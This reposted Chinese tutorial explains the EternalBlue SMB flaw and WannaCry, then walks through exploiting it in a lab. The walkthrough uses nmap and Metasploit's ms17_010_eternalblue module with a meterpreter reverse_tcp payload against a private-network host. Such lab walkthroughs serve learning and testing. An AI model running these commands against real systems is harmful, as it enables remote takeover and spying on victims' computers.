發布時間:2024-09-05閱讀(14)
基礎知識介紹:
1.何為永恒之藍?
永恒之藍(Eternal Blue)爆發于2017年4月14日晚,是一種利用Windows系統的SMB協議漏洞來獲取系統的最高權限,以此來控制被入侵的計算機。甚至于2017年5月12日, 不法分子通過改造“永恒之藍”制作了wannacry勒索病毒,使全世界大范圍內遭受了該勒索病毒,甚至波及到學校、大型企業、政府等機構,只能通過支付高額的贖金才能恢復出文件。不過在該病毒出來不久就被微軟通過打補丁修復。
2.什么是SMB協議?
SMB(全稱是Server Message Block)是一個協議服務器信息塊,它是一種客戶機/服務器、請求/響應協議,通過SMB協議可以在計算機間共享文件、打印機、命名管道等資源,電腦上的網上鄰居就是靠SMB實現的;SMB協議工作在應用層和會話層,可以用在TCP/IP協議之上,SMB使用TCP139端口和TCP445端口。
攻擊步驟:
一、確定攻擊目標
1.1使用kali打開nmap掃描目標主機。
使用nmap執行命令 nmap -sS -A 192.168.17.149
-sS(使用SYN掃描),-A(啟用操作系統檢測和版本檢測)。

1.2根據我們的掃描結果可以大致判斷該系統可能存在永恒之藍漏洞。
二、攻擊步驟
2.1執行命令msfconsole打開metasploit。
2.2執行命令 search ms17_010 查詢我們所需要的攻擊模塊。

2.3找到我們需要的攻擊模塊后執行命令,
use exploit/windows/smb/ms17_010_eternalblue
2.4執行命令 search payload 查找我們需要的payload。

2.5接下來我們利用該payload
執行命令 set payload windows/x64/meterpreter/reverse_tcp。
2.6執行命令 show options 來查看我們所需要設置的參數。
其中RHOSTS(被攻擊計算機IP)和LHOST(自己kali IP)是需要自己設置。

2.7執行命令:set LHOST 192.168.17.148,set RHOSTS 192.168.17.149即可。

2.8在設置好一切之后只需要執行命令 exploit 即可自動開始攻擊。出現截圖中的回顯時就表示已經攻擊成功了。

2.9我們只需要執行help即可查看我們能夠執行哪些操作。
最后我們執行了 meterpreter > screenshot 對被攻擊對象進行了屏幕截圖測試。

歡迎分享轉載→http://www.avcorse.com/read-402339.html
上一篇:傳統鞋業未來發展(虧損破產)
下一篇:紅娘是哪一部作品中的人物
Copyright ? 2024 有趣生活 All Rights Reserve吉ICP備19000289號-5 TXT地圖HTML地圖XML地圖